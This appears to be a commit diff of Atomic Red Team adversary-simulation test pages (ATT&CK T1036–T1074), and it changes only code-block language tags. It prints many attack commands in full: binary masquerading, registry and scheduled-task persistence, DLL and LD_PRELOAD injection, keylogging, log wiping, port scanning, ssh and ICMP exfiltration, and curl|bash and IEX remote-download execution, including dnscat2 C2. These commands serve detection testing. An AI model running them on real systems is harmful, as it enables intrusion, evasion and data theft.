cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
#### Cleanup Commands:
```
```cmd
del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
```
@@ -72,7 +74,9 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
#### Attack Commands: Run with `sh`!
```
```sh
cp /bin/sh /tmp/crond
/tmp/crond
```
@@ -93,13 +97,15 @@ Copies cscript.exe, renames it, and launches it to masquerade as an instance of
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
```
#### Cleanup Commands:
```
```cmd
del /Q /F %APPDATA%\notepad.exe >nul 2>&1
```
@@ -118,13 +124,15 @@ Copies wscript.exe, renames it, and launches it to masquerade as an instance of
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe /B
```
#### Cleanup Commands:
```
```cmd
del /Q /F %APPDATA%\svchost.exe >nul 2>&1
```
@@ -143,13 +151,15 @@ Copies powershell.exe, renames it, and launches it to masquerade as an instance
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
```
#### Cleanup Commands:
```
```cmd
del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
```
@@ -174,26 +184,29 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r
#### Attack Commands: Run with `powershell`!
```
```powershell
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{outputfile} -Force -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{inputfile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}"
```
@@ -218,14 +231,16 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
#### Attack Commands: Run with `powershell`!
```
```powershell
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{outputfile} -Force -ErrorAction Ignore
```
@@ -245,13 +260,15 @@ This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036 > C:\T1036.txt
```
#### Cleanup Commands:
```
```cmd
del C:\T1036.txt >nul 2>&1
del C:\lsm.exe >nul 2>&1
```
atomics/T1037/T1037.md
+20 -10
View File
@@ -41,13 +41,15 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo cmd /c "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
```
#### Cleanup Commands:
```
```cmd
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
del #{script_path} >nul 2>nul
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
@@ -68,13 +70,15 @@ Run an exe on user logon or system startup
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
```
#### Cleanup Commands:
```
```cmd
schtasks /delete /tn "T1037_OnLogon" /f
schtasks /delete /tn "T1037_OnStartup" /f
```
@@ -126,7 +130,9 @@ vbs files can be placed in and ran from the startup folder to maintain persistan
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
@@ -134,7 +140,7 @@ cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
```
@@ -154,7 +160,9 @@ jse files can be placed in and ran from the startup folder to maintain persistan
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
@@ -162,7 +170,7 @@ cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sta
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
```
@@ -182,7 +190,9 @@ bat files can be placed in and ran from the startup folder to maintain persistan
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
@@ -190,7 +200,7 @@ Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\bats
```
#### Cleanup Commands:
```
```powershell
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
```
atomics/T1038/T1038.md
+4 -2
View File
@@ -27,14 +27,16 @@ https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
```
#### Cleanup Commands:
```
```cmd
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
```
atomics/T1040/T1040.md
+12 -4
View File
@@ -32,7 +32,9 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -58,7 +60,9 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
```
@@ -85,7 +89,9 @@ installed, along with WinPCAP. Windump will require the windump executable.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
c:\windump.exe
```
@@ -112,7 +118,9 @@ installed, along with WinPCAP. Windump will require the windump executable.
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
& "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
& c:\windump.exe
```
atomics/T1042/T1042.md
+3 -1
View File
@@ -30,7 +30,9 @@ Change Default File Association From cmd.exe
#### Attack Commands: Run with `command_prompt`!
```
```cmd
cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
```
atomics/T1044/T1044.md
+3 -1
View File
@@ -34,7 +34,9 @@ copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-WmiObject win32_service | select PathName
get-acl "C:\Program Files (x86)\Google\Update\#{weak_permission_file}" | FL | findstr "FullControl"
```
atomics/T1046/T1046.md
+6 -2
View File
@@ -21,7 +21,9 @@ Scan ports to check for listening ports
#### Attack Commands: Run with `sh`!
```
```sh
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
@@ -51,7 +53,9 @@ Scan ports to check for listening ports with Nmap.
#### Attack Commands: Run with `sh`!
```
```sh
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
atomics/T1047/T1047.md
+18 -6
View File
@@ -29,7 +29,9 @@ WMI List User Accounts
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic useraccount get /ALL
```
@@ -49,7 +51,9 @@ WMI List Processes
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic process get caption,executablepath,commandline
```
@@ -69,7 +73,9 @@ WMI List Software
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic qfe get description,installedOn /format:csv
```
@@ -95,7 +101,9 @@ WMI List Remote Services
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%")
```
@@ -120,7 +128,9 @@ This test uses wmic.exe to execute a process on the local host.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic process call create #{process_to_execute}
```
@@ -146,7 +156,9 @@ This test uses wmic.exe to execute a process on a remote host.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
wmic /node:"#{node}" process call create #{process_to_execute}
```
atomics/T1048/T1048.md
+9 -3
View File
@@ -45,7 +45,9 @@ Remote to Local
#### Attack Commands: Run with `sh`!
```
```sh
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```
@@ -74,7 +76,9 @@ Local to Remote
#### Attack Commands: Run with `sh`!
```
```sh
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```
@@ -130,7 +134,9 @@ Exfiltration of specified file over ICMP protocol.
#### Attack Commands: Run with `powershell`!
```
```powershell
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```
atomics/T1049/T1049.md
+9 -3
View File
@@ -31,7 +31,9 @@ Get a listing of network connections.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netstat
net use
net sessions
@@ -53,7 +55,9 @@ Get a listing of network connections.
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-NetTCPConnection
```
@@ -73,7 +77,9 @@ Get a listing of network connections.
#### Attack Commands: Run with `sh`!
```
```sh
netstat
who -a
```
atomics/T1050/T1050.md
+14 -8
View File
@@ -27,26 +27,29 @@ Installs A Local Service
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sc.exe create #{service_name} binPath= #{binary_path}
sc.exe start #{service_name}
```
#### Cleanup Commands:
```
```cmd
sc.exe stop #{service_name}
sc.exe delete #{service_name}
```
#### Dependencies: Run with `powershell`!
##### Description: Service binary must exist on disk at specified location (#{binary_path})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{binary_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"
```
@@ -71,27 +74,30 @@ Installs A Local Service via PowerShell
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" 2>&1 | Out-Null
Start-Service -Name "#{service_name}"
```
#### Cleanup Commands:
```
```powershell
Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
catch {}
```
#### Dependencies: Run with `powershell`!
##### Description: Service binary must exist on disk at specified location (#{binary_path})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{binary_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"
```
atomics/T1053/T1053.md
+15 -7
View File
@@ -26,7 +26,9 @@ Note: deprecated in Windows 8+
#### Attack Commands: Run with `command_prompt`!
```
```cmd
at 13:20 /interactive cmd
```
@@ -51,12 +53,14 @@ at 13:20 /interactive cmd
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
```
#### Cleanup Commands:
```
```cmd
SCHTASKS /Delete /TN spawn /F
```
@@ -84,12 +88,14 @@ Create a task on a remote system
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
#### Cleanup Commands:
```
```cmd
SCHTASKS /Delete /TN "Atomic task" /F
```
@@ -109,7 +115,9 @@ These could be considered "fileless" scheduled task creation.
#### Attack Commands: Run with `powershell`!
```
```powershell
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
@@ -119,7 +127,7 @@ Register-ScheduledTask AtomicTask -InputObject $object
```
#### Cleanup Commands:
```
```powershell
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
```
atomics/T1055/T1055.md
+22 -9
View File
@@ -54,21 +54,24 @@ Windows 10 Utility To Inject DLLS
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING #{dll_payload}
```
#### Dependencies: Run with `powershell`!
##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055.dll" -OutFile "#{dll_payload}"
```
@@ -93,7 +96,9 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$mypid = #{process_id}
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
```
@@ -119,7 +124,9 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
echo #{path_to_shared_library} > /etc/ld.so.preload
```
@@ -144,7 +151,9 @@ This test injects a shared object library via the LD_PRELOAD environment variabl
#### Attack Commands: Run with `bash`!
```
```bash
LD_PRELOAD=#{path_to_shared_library} ls
```
@@ -176,7 +185,9 @@ Excercises Five Techniques
#### Attack Commands: Run with `command_prompt`!
```
```cmd
.\bin\#{exe_binary}
```
@@ -197,13 +208,15 @@ This works by copying cmd.exe to a file, naming it svchost.exe, then copying a f
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
```
#### Cleanup Commands:
```
```cmd
del C:\T1055.txt >nul 2>&1
del C:\svchost.exe >nul 2>&1
```
atomics/T1056/T1056.md
+4 -2
View File
@@ -30,13 +30,15 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
```
#### Cleanup Commands:
```
```powershell
Remove-Item $env:TEMP\key.log -ErrorAction Ignore
```
atomics/T1057/T1057.md
+6 -2
View File
@@ -32,7 +32,9 @@ Utilize ps to identify processes
#### Attack Commands: Run with `sh`!
```
```sh
ps >> #{output_file}
ps aux >> #{output_file}
```
@@ -53,7 +55,9 @@ Utilize tasklist to identify processes
#### Attack Commands: Run with `command_prompt`!
```
```cmd
tasklist
```
atomics/T1058/T1058.md
+3 -1
View File
@@ -27,7 +27,9 @@ reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePa
#### Attack Commands: Run with `powershell`!
```
```powershell
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
```
atomics/T1059/T1059.md
+3 -1
View File
@@ -21,7 +21,9 @@ This will download the specified payload and set a marker file in `/tmp/art-fish
#### Attack Commands: Run with `sh`!
```
```sh
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
```
atomics/T1060/T1060.md
+12 -6
View File
@@ -59,12 +59,14 @@ Run Key Persistence
#### Attack Commands: Run with `command_prompt`!
```
```cmd
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
```
#### Cleanup Commands:
```
```cmd
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
@@ -88,12 +90,14 @@ RunOnce Key Persistence
#### Attack Commands: Run with `command_prompt`!
```
```cmd
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
```
#### Cleanup Commands:
```
```cmd
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
@@ -118,13 +122,15 @@ RunOnce Key Persistence via PowerShell
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
```
atomics/T1062/T1062.md
+3 -1
View File
@@ -26,7 +26,9 @@ Create a New-VM
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
atomics/T1063/T1063.md
+15 -5
View File
@@ -34,7 +34,9 @@ Methods to identify Security Software on an endpoint
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netsh.exe advfirewall firewall show all profiles
tasklist.exe
tasklist.exe | findstr /i virus
@@ -59,7 +61,9 @@ Methods to identify Security Software on an endpoint
#### Attack Commands: Run with `powershell`!
```
```powershell
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
@@ -82,7 +86,9 @@ Methods to identify Security Software on an endpoint
#### Attack Commands: Run with `sh`!
```
```sh
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
@@ -103,7 +109,9 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
fltmc.exe | findstr.exe 385201
```
@@ -123,7 +131,9 @@ Discovery of installed antivirus products via a WMI query.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
```
atomics/T1064/T1064.md
+7 -3
View File
@@ -23,7 +23,9 @@ Creates and executes a simple bash script.
#### Attack Commands: Run with `sh`!
```
```sh
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
@@ -52,13 +54,15 @@ Creates and executes a simple batch script.
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
```
#### Cleanup Commands:
```
```cmd
del #{script_to_create} >nul 2>&1
```
atomics/T1065/T1065.md
+6 -2
View File
@@ -25,7 +25,9 @@ Testing uncommonly used port utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
test-netconnection -ComputerName #{domain} -port #{port}
```
@@ -51,7 +53,9 @@ Testing uncommonly used port utilizing telnet.
#### Attack Commands: Run with `sh`!
```
```sh
telnet #{domain} #{port}
```
atomics/T1069/T1069.md
+12 -4
View File
@@ -41,7 +41,9 @@ Permission Groups Discovery
#### Attack Commands: Run with `sh`!
```
```sh
dscacheutil -q group
dscl . -list /Groups
groups
@@ -63,7 +65,9 @@ Basic Permission Groups Discovery for Windows
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net localgroup
net group /domain
net group "domain admins" /domain
@@ -90,7 +94,9 @@ Permission Groups Discovery utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
get-localgroup
get-ADPrincipalGroupMembership #{user} | select name
```
@@ -111,7 +117,9 @@ Runs "net group" command including command aliases and loose typing to simulate
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net group /domai "Domain Admins"
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
atomics/T1070/T1070.md
+22 -8
View File
@@ -50,7 +50,9 @@ Clear Windows Event Logs
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
wevtutil cl #{log_name}
```
@@ -70,7 +72,9 @@ Manages the update sequence number (USN) change journal, which provides a persis
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
fsutil usn deletejournal /D C:
```
@@ -90,7 +94,9 @@ Delete system and audit logs
#### Attack Commands: Run with `sh`!
```
```sh
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
```
@@ -116,7 +122,9 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
#### Attack Commands: Run with `bash`!
```
```bash
echo 0> /var/spool/mail/#{username}
```
@@ -141,7 +149,9 @@ This test overwrites the specified log. This technique was used by threat actor
#### Attack Commands: Run with `bash`!
```
```bash
echo 0> #{log_path}
```
@@ -161,14 +171,16 @@ Recommended Detection: Monitor for use of the windows event log filepath in Powe
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId
Stop-Process -Id $eventLogId -Force
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
```
#### Cleanup Commands:
```
```powershell
Start-Service -Name EventLog
```
@@ -187,7 +199,9 @@ Clear event logs using built-in PowerShell commands
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Clear-EventLog -logname Application
```
atomics/T1071/T1071.md
+25 -9
View File
@@ -39,7 +39,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
#### Attack Commands: Run with `powershell`!
```
```powershell
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
@@ -68,7 +70,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
#### Attack Commands: Run with `command_prompt`!
```
```cmd
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
@@ -97,7 +101,9 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
#### Attack Commands: Run with `sh`!
```
```sh
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
@@ -129,7 +135,9 @@ The intent of this test is to trigger threshold based detection on the number of
#### Attack Commands: Run with `powershell`!
```
```powershell
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
```
@@ -160,7 +168,9 @@ This behaviour is typical of implants either in an idle state waiting for instru
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -189,7 +199,9 @@ The simulation involves sending DNS queries that gradually increase in length un
#### Attack Commands: Run with `powershell`!
```
```powershell
Set-Location $PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
@@ -219,7 +231,9 @@ https://github.com/lukebaggett/dnscat2-powershell
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
```
@@ -246,13 +260,15 @@ Uses cscript //E:jscript to download a file
#### Attack Commands: Run with `command_prompt`!
```
```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```
```cmd
del #{script_file} /F /Q >nul 2>&1
```
atomics/T1073/T1073.md
+4 -2
View File
@@ -24,12 +24,14 @@ GUP is an open source signed binary used by Notepad++ for software updates, and
#### Attack Commands: Run with `command_prompt`!
```
```cmd
$PathToAtomicsFolder\T1073\bin\GUP.exe
```
#### Cleanup Commands:
```
```cmd
taskkill /F /IM #{process_name}
```
atomics/T1074/T1074.md
+10 -4
View File
@@ -23,7 +23,9 @@ Utilize powershell to download discovery.bat and save to a local file
#### Attack Commands: Run with `powershell`!
```
```powershell
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat') > pi.log
```
@@ -43,7 +45,9 @@ Utilize curl to download discovery.sh and execute a basic information gathering
#### Attack Commands: Run with `bash`!
```
```bash
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log
```
@@ -63,12 +67,14 @@ Use living off the land tools to zip a file and stage it in the Windows temporar
#### Attack Commands: Run with `powershell`!
```
```powershell
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
```
#### Cleanup Commands:
```
```powershell
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
```
atomics/T1075/T1075.md
